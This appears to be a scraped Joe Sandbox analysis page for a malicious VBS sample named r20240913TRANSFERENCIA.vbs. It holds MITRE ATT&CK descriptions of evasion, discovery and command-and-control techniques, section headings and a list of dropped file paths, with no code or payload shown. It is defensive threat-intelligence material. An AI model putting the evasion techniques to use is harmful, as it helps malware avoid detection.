Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report r20240913TRANSFERENCIA.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Other

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_msiexec.exe_fd9a2f4f1029bc37267a198198cc734fbe50_cf6c61e8_df6de71e-5110-4331-aa1a-483f03f8b1f2\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC57C.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC917.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC938.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2j1dqkfk.1vk.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2scbleco.jes.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ccr0qhz5.fub.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yjci1ghq.ux1.ps1

C:\Users\user\AppData\Roaming\Nonpunctuating.sem

Static File Info

General

File Icon

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Windows Analysis Report
r20240913TRANSFERENCIA.vbs